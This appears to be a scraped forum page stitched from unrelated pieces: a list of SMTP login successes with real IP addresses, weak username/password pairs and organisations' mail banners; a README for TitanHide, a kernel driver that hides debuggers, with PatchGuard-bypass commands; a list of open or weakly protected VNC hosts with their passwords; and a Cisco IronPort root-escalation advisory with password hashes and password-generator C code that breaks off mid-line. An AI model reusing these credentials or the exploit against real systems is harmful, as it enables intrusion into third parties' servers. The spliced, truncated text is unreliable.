Search the Community

200.32.93.222 demo demo|220 mail.dekagb.com 200.32.93.218 demo demo|220 DTCN7.dekagb.net Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 08:52:27 -0300 200.32.93.216 demo demo|220 mail.dekagb.com.ar 200.57.38.190 demo demo|220 mail.tralcom.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 05:55:13 -0600 200.55.165.50 director director|220 correo.tecnologico.co.cu ESMTP MDaemon 9.6.1; Sun, 08 Feb 2015 08:11:47 -0800 200.55.170.194 director director|220 citurvar.tur.cu ESMTP MDaemon 10.0.5; Sun, 08 Feb 2015 08:16:41 -0500 201.247.157.13 display display|220 navegante.com.sv modusMail ESMTP Receiver Version 4.7.840.5 Ready 200.169.219.12 dummy dummy|220 inosplex02.ptin.corpPT.com Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 12:41:32 -0200 200.252.137.68 dummy dummy|220 mail.patri.com.br Sun, 8 Feb 2015 12:47:55 -0200. 200.160.124.14 fax fax|220 S-FRONTMXCB.CBNET.COM.BR Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Sun, 8 Feb 2015 14:46:03 -0200 75.84.162.226 fax fax|220 ESMTP CMailServer 5.3.2005.07.08 SMTP Service Ready 200.88.222.227 front front|220 gshppvdat00.puertoplatavillage.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Sun, 8 Feb 2015 14:43:23 -0400 75.12.139.94 frontdesk frontdesk|220 mail.tomaslaw.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 13:04:58 -0600 200.11.75.69 ftpuser ftpuser|220 obi.tchile.com ESMTP Postfix 200.51.194.181 guest guest|220 LPPDTC4.cmpc.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 17:04:25 -0300 200.45.19.242 info info|220 mail.cpcecba.org.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 18:58:48 -0300 200.55.136.106 info info|220 dmarco.co.cu ESMTP MDaemon 11.0.3; Sun, 08 Feb 2015 16:56:28 -0500 201.247.100.140 info info|220 corsatursvr.corsatur.gob.sv Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 16:03:54 -0600 75.77.64.50 intern intern|220 mail.columbusmuseum.com 200.115.128.27 internet internet|220 viajero.eveloz.com ESMTP Exim 4.75 Sun, 08 Feb 2015 17:32:02 -0500 200.178.24.194 internet internet|220 mailserver.afam.com.br ESMTP (7aa3dafd2d1317454d56b449edfd3b79) 200.201.128.254 internet internet|220 GRANITO.geoklock.com.br Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 20:37:26 -0200 200.45.112.162 internet internet|220 mail.ctmm.com.ar Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 19:40:24 -0300 201.253.120.2 internet internet|220 mail.copanacea.com.ar Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 19:46:59 -0300 200.56.225.54 mail mail|220 ***************************************************************************************************** 201.234.138.19 mail mail|220 Mail01.telered.com.ar+-+El+envio+de+email+no+solicitado+sera+bloqueado+permanentemente. ESMTP 200.35.108.58 manager manager|220 relay.planinsa.com ESMTP Postfix (Ubuntu) 200.111.183.18 monitor monitor|220 smtp.bomberos.cl ESMTP IceWarp 10.4.6 (2013-07-25) RHEL6; Mon, 09 Feb 2015 00:09:50 -0300 200.123.137.43 monitor monitor|220 lexchangen01vpr.cabal.coop Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Mon, 9 Feb 2015 00:03:48 -0300 200.252.194.138 monitor monitor|220 mail.grupotodimo.com.br Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:12:36 -0300 200.54.77.43 monitor monitor|220 rosen.cl Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 00:09:36 -0300 200.54.77.42 monitor monitor|220 rosen.cl Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 00:09:36 -0300 200.58.120.66 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.64 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.67 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.69 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.65 news news|220 HMEXCAS02.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:18 -0300 201.175.40.106 newsletter newsletter|220 ciclope.credisys.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 22:00:00 -0600 200.159.76.162 operator operator|220 CARBONTIP.ecil.int Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 02:55:40 -0200 200.232.22.187 operator operator|220 CARBONTIP.ecil.int Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 02:57:17 -0200 200.42.173.146 oracle oracle|220 mail.crbcodelco.cl ESMTP Postfix (Debian/GNU) 200.108.214.63 postfix postfix|220 smtp.sonda.com.uy ESMTP Postfix 200.248.151.21 postgres postgres|220 MAILMTZV01.sulmaq.com.br Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 04:19:41 -0200 200.55.138.62 pr pr|220 geiconemail.geicon.cu ESMTP MDaemon 11.0.0; Mon, 09 Feb 2015 01:55:29 -0500 200.59.13.90 pr pr|220 transfurlong.com.ar ESMTP Service ready 200.110.31.228 printer printer|220 mail.OperadorSanta.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 02:16:36 -0500 200.142.97.46 printer printer|220 barboza.makeconsultores.com.br Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 05:01:45 -0200 75.77.194.50 printer printer|220 nas.clt.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 02:22:38 -0500 200.101.136.98 scanner scanner|220 ns1.sengespapel.com.br ESMTP - SengesPapel 200.122.225.194 scanner scanner|220 ************************* 200.127.152.132 scanner scanner|220 LURO7.edeaweb.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 07:43:32 -0300 200.148.141.27 scanner scanner|220 AUTO8KSPA.cieautometal.com.br Microsoft ESMTP MAIL Service, Version: 7.5.7601.17514 ready at Mon, 9 Feb 2015 08:44:45 -0200 200.149.223.180 scanner scanner|220 GT-SRV-EXMBS01.tecnometal.net Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 08:44:47 -0200 200.169.19.118 scanner scanner|220 mail.federasul.com.br Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 08:42:10 -0200 200.175.156.47 scanner scanner|220 mail.provenda.com.br ESMTP Postfix 200.205.46.26 scanner scanner|220 *********************************************************************************************** 200.251.41.34 scanner scanner|220 mail.fundacaolibertas.com.br ESMTP Postfix 200.31.85.51 scanner scanner|220 AROLENHUB01.arolen.corp Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 05:49:42 -0500 200.51.96.196 scanner scanner|220 eofe2k10.estudio-ofarrell.com.ar Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 07:51:46 -0300 200.55.9.130 scanner scanner|220 SESME04.esme.corp Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 07:51:41 -0300 200.6.115.125 scanner scanner|220 correo2010.corp.iia.cl Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 07:52:36 -0300 200.6.122.206 scanner scanner|220 molle.tchile.com ESMTP Postfix 200.68.19.131 scanner scanner|220 mail.herenciaresources.cl ESMTP 200.68.115.89 scanner scanner|220 mail.maianviajes.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 07:52:48 -0300 200.70.55.130 scanner scanner|220 mail.fagra.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 07:52:56 -0300 201.216.246.73 scanner scanner|220 srvgateway2.adwargentina.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 08:00:00 -0300 75.56.238.13 scanner scanner|220 marklin.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 04:55:29 -0600 75.77.14.131 scanner scanner|220 PPMEXCH-CT01.precisionpractice.com Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 04:55:30 -0600 75.56.239.57 shipping shipping|220 mail.ghwilke.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 06:16:43 -0600 75.77.35.130 shipping shipping|220 mail.questgraphics.com Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 06:16:45 -0600 200.6.117.54 software software|220 web004.anacondaweb.com ESMTP Sendmail 8.13.8/8.13.8; Mon, 9 Feb 2015 10:34:22 -0300 200.123.133.161 spam spam|220 exmdt.bsas.mdtmdt.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 10:42:19 -0300 200.194.232.114 spam spam|220 trinity.sodisa.com.br ESMTP 200.71.234.158 spam spam|220 hospitalprivadosa.com.ar ESMTP MDaemon 11.0.3; Mon, 09 Feb 2015 10:51:32 -0300 200.85.168.91 spam spam|220 cndc.org.ni ESMTP MDaemon 13.0.4; Mon, 09 Feb 2015 07:52:03 -0600 200.111.67.74 supervisor supervisor|220 at6425.tchile.com ESMTP Postfix 200.77.232.115 supervisor supervisor|220 CORPKIOE2K708.corp.televisa.com.mx Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 08:40:42 -0600 200.77.232.114 supervisor supervisor|220 CORPKIOE2K708.corp.televisa.com.mx Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 08:40:42 -0600 201.234.152.174 terminal terminal|220 insrvexvm.INDELMA.LOCAL Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Mon, 9 Feb 2015 13:48:11 -0300 200.55.198.132 test test|220 EXCH01.ceim-fee.cl Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 13:58:04 -0300 201.225.228.126 test test|220 PAAFIS01.cafis.com ESMTP MailEnable Service, Version: 1.986-- ready at 02/09/15 09:05:42 200.108.214.2 tester tester|220 Amaranto.ccagraria.com.uy Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 15:37:43 -0200 200.40.236.20 tester tester|220 Amaranto.ccagraria.com.uy Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 15:48:16 -0200 75.76.126.57 training training|220 *************************************************************************************** 200.203.135.100 vnc vnc|220 smtp.princesadoscampos.com.br ESMTP Postfix 200.55.193.186 web web|220 serverweb Microsoft ESMTP MAIL Service, Version: 5.0.2195.7381 ready at Mon, 9 Feb 2015 17:37:51 -0400

Overview TitanHide is a driver intended to hide debuggers from certain processes. The driver hooks various Nt* kernel functions (using SSDT table hooks) and modifies the return values of the original functions. To hide a process, you must pass a simple structure with a ProcessID and the hiding option(s) to enable, to the driver. The internal API is designed to add hooks with little effort, which means adding features is really easy. Features ProcessDebugFlags (NtQueryInformationProcess) ProcessDebugPort (NtQueryInformationProcess) ProcessDebugObjectHandle (NtQueryInformationProcess) DebugObject (NtQueryObject) SystemKernelDebuggerInformation (NtQuerySystemInformation) NtClose (STATUS_INVALID_HANDLE exception) ThreadHideFromDebugger (NtSetInformationThread) Protect DRx (HW BPs) (NtSetContextThread) Test environments Windows 7 x64 & x86 (SP1) Windows XP x86 (SP3) Windows XP x64 (SP1) Compiling Install Visual Studio 2013 (Express Edition untested). Install the WDK. Open TitanHide.sln and hit compile! Installation Method 1 Copy TitanHide.sys to %systemroot%\system32\drivers. Start ServiceManager.exe (available on the download page). Delete the old service (when present). Install a new service (specify the full path to TitanHide.sys). Start the service you just created. Use TitanHideGUI.exe to set hide options for a PID. Installation Method 2 Copy TitanHide.sys to %systemroot%\system32\drivers. Run the command sc create TitanHide binPath=%systemroot%\system32\drivers\TitanHide.sys type=kernel to create the TitanHide service. Run the command sc start TitanHide to start the TitanHide service. Run the command sc query TitanHide to check if TitanHide is running. Testsigning & PatchGuard A simple way to 'bypass' PatchGuard on x64 systems is by enabling a local kernel debugger. This can be done by executing the following commands in an Administrator Console: bcdedit /set testsigning on bcdedit /debug on bcdedit /dbgsettings local /noumex In addition to the commands above you need to set BreakOnSysRq if you want to use the PrntScr button. Read this article for more information. You can also import BreakOnSysRq.reg to automatically fix this problem. Remarks When using x64_dbg, you can use the TitanHide plugin (available on the download page). When using EsetNod32 AV, disable "Realtime File Protection", to prevent a BSOD when starting TitanHide. You can re-enable it right afterwards Download https://bitbucket.org/mrexodia/titanhide/downloads

213.221.231.148:5900-null-[VNC] 49.212.222.41:5900-null-[katuyu@www33027ue] 222.74.224.141:5900-micros-[NSFOCUS SAS-H] 222.74.224.140:5900-micros-[NSFOCUS SAS-H] 222.74.224.142:5900-micros-[NSFOCUS SAS-H] 222.106.61.196:5900-null-[None] 222.106.42.14:5900-null-[None] 222.106.83.172:5900-null-[None] 222.106.42.13:5900-null-[None] 222.105.233.119:5900-null-[T4A] 222.109.62.214:5900-null-[: ] 222.110.182.146:5900-null-[oracle@ufit.tson.co.kr] 222.112.99.199:5900-null-[hadoop@hadoopmaster01.dunamis] 222.122.217.212:5900-null-[QEMU (i-2-4980-VM)] 222.122.217.138:5900-null-[QEMU (i-2-4979-VM)] 222.122.217.185:5900-null-[QEMU (r-4977-VM)] 222.122.253.178:5900-null-[x11] 222.124.215.99:5900-null-[admin_cipta_karya@server] 222.124.28.189:5900-null-[QEMU (instance-0000012a)] 222.126.232.254:5900-null-[x11] 222.127.128.91:5900-null-[None] 222.126.246.213:5900-null-[x11] 222.126.233.76:5900-null-[x11] 222.122.148.66:5900-null-[None] 222.150.216.53:5900-null-[Device 10001] 222.154.97.132:5900-null-[youf3@NAS] 222.165.168.97:5900-null-[None] 222.164.209.61:5900-null-[rick@lucht01] 222.171.171.5:5900-null-[QEMU (?????_191ff096-e1fc-4c16-b692-c453e8e16d61)] 222.171.171.4:5900-null-[QEMU (????????_ddd131db-c51b-4e11-8d17-bca7da34a041)] 222.180.149.236:5900-null-[QEMU (????-1_411d3d95-4d3d-4138-ba32-8d30759a5f0c)] 222.172.221.22:5900-null-[None] 222.188.198.170:5900-null-[20120821-1658] 222.190.107.203:5900-null-[DCSY-AD] 222.201.132.12:5900-null-[QEMU (instance-00000001)] 222.201.132.13:5900-null-[QEMU (instance-00000007)] 222.200.123.237:5900-null-[reyzar@6cae09.gdut.reyzar.net] 222.200.123.234:5900-null-[reyzar@6cae06.gdut.reyzar.net] 222.200.123.238:5900-null-[reyzar@6cae10.gdut.reyzar.net] 222.205.111.236:5900-null-[None] 222.211.74.42:5900-null-[None] 222.222.108.246:5900-null-[None] 222.222.32.68:5900-null-[None] 222.236.31.230:5900-null-[Device 0] 222.252.25.170:5900-null-[None] 222.255.221.157:5900-micros-[HMI WebServer] 222.36.0.242:5900-null-[tjtthlw@localhost.localdomain] 222.42.245.41:5900-null-[QEMU] 222.255.29.27:5900-null-[None] 222.36.0.246:5900-null-[None] 222.73.136.95:5900-null-[QEMU (instance-00000020)] 222.73.22.8:5900-null-[QEMU (S003592)] 222.76.53.65:5900-null-[WIN-04071046] 222.74.224.140:5900-micros-[NSFOCUS SAS-H] 222.74.224.142:5900-micros-[NSFOCUS SAS-H] 222.80.155.72:5900-null-[2003SERVER] 222.80.184.22:5900-null-[LibVNCServer] 222.77.74.5:5900-null-[QEMU (instance-00000015)] 222.74.224.141:5900-micros-[NSFOCUS SAS-H] 222.82.21.195:5900-null-[1RY9ODIUXNLU1UT] 222.85.16.11:5900-null-[a3] 222.85.16.130:5900-null-[None] 222.85.16.138:5900-null-[None] 222.85.16.114:5900-null-[None] 222.85.16.112:5900-null-[None] 222.85.16.211:5900-null-[x29] 222.85.16.101:5900-null-[None] 222.85.16.179:5900-null-[a59] 222.85.16.217:5900-null-[a12] 222.85.16.189:5900-null-[None] 222.85.16.137:5900-null-[b19] 222.85.16.172:5900-null-[None] 222.85.16.140:5900-null-[None] 222.85.16.170:5900-null-[None] 222.85.16.212:5900-null-[None] 222.85.16.151:5900-null-[None] 222.85.16.56:5900-null-[None] 222.85.16.190:5900-null-[x34] 222.85.16.145:5900-null-[None] 222.85.16.127:5900-null-[a38] 222.85.16.236:5900-null-[a88] 222.85.16.148:5900-null-[None] 222.85.16.12:5900-null-[a13] 222.85.16.142:5900-null-[a32] 222.85.16.171:5900-null-[x93] 222.85.16.146:5900-null-[None] 222.85.16.149:5900-null-[None] 222.85.16.77:5900-null-[x82] 222.85.16.124:5900-null-[None] 222.85.90.196:5900-null-[LibVNCServer] 222.85.16.187:5900-null-[None] 222.85.16.188:5900-null-[x43] 222.85.16.98:5900-null-[None] 222.85.16.220:5900-null-[x35] 222.85.16.49:5900-null-[x60] 222.85.16.201:5900-null-[b59] 222.85.16.42:5900-null-[None] 222.85.16.17:5900-null-[b70] 222.85.16.160:5900-null-[a73] 222.85.16.181:5900-null-[None] 222.85.16.245:5900-null-[a94] 222.85.16.62:5900-null-[None] 222.85.16.125:5900-null-[None] 222.85.16.81:5900-null-[None] 222.85.16.46:5900-null-[None] 222.85.16.253:5900-null-[None] 222.85.16.205:5900-null-[None] 222.85.16.27:5900-null-[None] 222.85.16.64:5900-null-[b27] 222.85.16.223:5900-null-[None] 222.85.16.100:5900-null-[None] 222.85.16.19:5900-null-[None] 222.85.16.3:5900-null-[b32] 222.85.16.174:5900-null-[None] 222.85.16.248:5900-null-[None] 222.85.16.34:5900-null-[None] 222.85.16.35:5900-null-[None] 222.85.16.66:5900-null-[a18] 222.85.16.176:5900-null-[a101] 222.85.16.10:5900-null-[b99] 222.85.16.72:5900-null-[x38] 222.85.16.238:5900-null-[None] 222.85.16.93:5900-null-[None] 222.85.16.175:5900-null-[x46] 222.85.16.38:5900-null-[a50] 222.85.16.5:5900-null-[None] 222.85.16.169:5900-null-[None] 222.85.16.9:5900-null-[None] 222.85.16.136:5900-null-[a41] 222.85.16.84:5900-null-[x12] 222.85.16.83:5900-null-[None] 222.85.16.168:5900-null-[None] 222.85.16.75:5900-null-[None] 222.85.16.153:5900-null-[x49] 222.85.16.193:5900-null-[None] 222.85.16.241:5900-null-[a99] 222.85.16.126:5900-null-[None] 222.85.16.87:5900-null-[None] 222.85.16.210:5900-null-[None] 222.85.16.88:5900-null-[None] 222.85.16.224:5900-null-[b44] 222.85.16.102:5900-null-[None] 222.85.16.69:5900-null-[None] 222.85.16.57:5900-null-[None] 222.85.16.82:5900-null-[None] 222.85.16.158:5900-null-[None] 222.85.16.203:5900-null-[b31] 222.85.16.244:5900-null-[None] 222.85.16.74:5900-null-[None] 222.85.16.20:5900-null-[b46] 222.85.16.85:5900-null-[b35] 222.85.16.58:5900-null-[b11] 222.85.16.97:5900-null-[None] 222.85.16.99:5900-null-[x41] 222.85.16.65:5900-null-[None] 222.85.16.52:5900-null-[a28] 222.85.16.225:5900-null-[a80] 222.85.16.67:5900-null-[None] 222.85.16.22:5900-null-[None] 222.85.16.227:5900-null-[b63] 222.85.16.39:5900-null-[None] 222.85.16.94:5900-null-[x89] 222.85.16.246:5900-null-[None] 222.85.16.157:5900-null-[b94] 222.85.16.54:5900-null-[b45] 222.85.16.182:5900-null-[None] 222.85.16.197:5900-null-[b82] 222.85.16.186:5900-null-[b83] 222.85.16.29:5900-null-[None] 222.85.16.63:5900-null-[a97] 222.85.16.229:5900-null-[b2] 222.85.16.139:5900-null-[None] 222.85.16.250:5900-null-[None] 222.85.16.143:5900-null-[None] 222.85.16.89:5900-null-[None] 222.93.218.217:5900-null-[None] 222.95.130.48:5900-null-[OJDPG4G8ZQ4F40L] 222.103.210.64:5900-12345678-[None] 222.103.210.71:5900-12345678-[pc071] 222.103.210.72:5900-12345678-[pc072] 222.103.210.44:5900-12345678-[pc044] 222.103.210.47:5900-12345678-[pc047] 222.103.210.45:5900-12345678-[pc045] 222.103.210.46:5900-12345678-[pc046] 222.103.210.40:5900-12345678-[pc040] 222.108.214.106:5900-12345678-[XP-201409131002] 222.124.159.134:5900-12345678-[disnakertrans] 222.182.244.226:5900-12345678-[2013-20140828IR] 222.236.46.117:5900-12345678-[adt-count ( 222.236.46.117 ) - service mode] 222.73.136.251:5900-null-[QEMU (instance-00000021)] 222.77.72.98:5900-null-[LAOM-0000000] 222.85.16.166:5900-null-[None] 222.85.16.132:5900-null-[None] 222.85.16.60:5900-null-[None] 222.154.228.221:5900-password-[botany ( 10.1.1.5 ) - service mode] 222.229.216.116:5900-password-[homehands ( 192.168.200.132, 192.168.100.200, 192.168.1.200 )] 222.42.150.35:5900-password-[xpe00f1f30c3f92] 222.111.10.170:5900-1212-[host ( 222.111.10.170, 192.168.0.101 ) - service mode] 222.98.109.233:5900-1212-[gate ( 222.98.109.233, 169.254.134.254 )] 222.99.112.146:5900-1212-[iamage ( 222.99.112.146 ) - service mode] 222.99.112.145:5900-1212-[gate ( 222.99.112.145 ) - service mode] 222.107.103.33:5900-manager-[pc_shop418 ( 222.107.103.33 ) - service mode] 222.85.16.198:5900-null-[None] 223.153.105.29:5900-null-[SHOP6128] 223.147.89.253:5900-null-[None] 223.17.243.177:5900-null-[visa ( 223.17.243.177, 192.168.0.7 ) - service mode] 223.203.199.120:5900-null-[QEMU (centos-6.5-network1)] 223.203.212.23:5900-null-[QEMU (instance-00000009)] 223.203.212.49:5900-null-[QEMU (instance-00000009)] 223.204.90.160:5900-null-[T10A] 223.204.165.102:5900-null-[OFFICE01] 223.205.105.7:5900-null-[perfect@localhost.localdomain] 223.27.252.141:5900-null-[None] 223.27.241.188:5900-null-[None] 223.30.150.233:5900-null-[openfir@chat] 223.30.244.2:5900-null-[None] 223.30.236.74:5900-null-[None] 223.30.64.67:5900-null-[None] 223.197.208.36:5900-12345678-[sc096a ( 10.54.96.11 ) - service mode] 223.205.229.13:5900-12345678-[ADMINIST-20E326] 223.204.146.2:5900-12345678-[pc2013071818how ( 192.168.1.253 ) - service mode] 223.30.150.242:5900-null-[nishant@email1] 223.246.224.241:5900-12345678-[heart] 223.204.187.138:5900-null-[None] 223.197.215.157:5900-password-[None] 223.30.2.179:5900-password-[APPSERVER] 223.205.91.174:5900-support-[TM016-SERVER]

/* Cisco Ironport Appliances Privilege Escalation Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.5.5-280 Cisco Ironport WSA - AsyncOS 8.0.5-075 Cisco Ironport SMA - AsyncOS 8.3.6-0 Date: 22/05/2014 Credits: Glafkos Charalambous CVE: Not assigned by Cisco Disclosure Timeline: 19-05-2014: Vendor Notification 20-05-2014: Vendor Response/Feedback 27-08-2014: Vendor Fix/Patch 24-01-2015: Public Disclosure Description: Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support. Vendor Response: As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account. [SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password. [GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access. [SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528 Technical Details: By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc. PoC: Enable Service Account ---------------------- root@kali:~# ssh -lenablediag 192.168.0.158 Password: Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance Available Commands: help -- View this text. quit -- Log out. service -- Enable or disable access to the service system. network -- Perform emergency configuration of the diagnostic network interface. clearnet -- Resets configuration of the diagnostic network interface. ssh -- Configure emergency SSH daemon on the diagnostic network interface. clearssh -- Stop emergency SSH daemon on the diagnostic network interface. tunnel -- Start up tech support tunnel to IronPort. print -- Print status of the diagnostic network interface. reboot -- Reboot the appliance. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently disabled. ironport.example.com> service Service Access is currently disabled. Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues. Are you sure you want to do this? [Y/N]> Y Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system. []> cisco123 Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently ENABLED (0 current service logins) ironport.example.com> Generate Service Account Password --------------------------------- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe Usage: woofwoof.exe -p password -s serial -p <password> | Cisco Service Temp Password -s <serial> | Cisco Serial Number -h | This Help Menu Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4 Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019 F508A4 Service Password: b213c9a4 Login to the appliance as Service account with root privileges -------------------------------------------------------------- root@kali:~# ssh -lservice 192.168.0.158 Password: Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance # uname -a FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64 # cat /etc/master.passwd # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $ root:*:0:0::0:0:Mr &:/root:/sbin/nologin service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include "md5.h" #include "getopt.h" #define MAX_BUFFER 128 #define SECRET_PASS "woofwoof" void usage(char *name); void to_lower(char *str); void fuzz_string(char *str); int main(int argc, char *argv[]) { if (argc < 2) { usage(argv[0]); } int opt; int index; char *temp_pass = { 0 }; char *serial_no = { 0 }; char *secret_pass = SECRET_PASS; char service[MAX_BUFFER] = { 0 }; unsigned char digest[16] = { 0 }; while ((opt = getopt(argc, argv, "p:s:h")) != -1) { switch (opt) { case 'p': temp_pass = optarg; break; case 's': serial_no = optarg; break; case 'h': usage(argv[0]); break; default: printf_s("Wrong Argument: %s\n", argv[1]); break; } } for (index = optind; index < argc; index++) { usage(argv[0]); exit(0); } if (temp_pass == NULL || serial_no == NULL) { usage(argv[0]); exit(0); } if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) { to_lower(serial_no); fuzz_string(temp_pass); strcpy_s(service, sizeof(service), temp_pass); strcat_s(service, sizeof(service), serial_no); strcat_s(service, 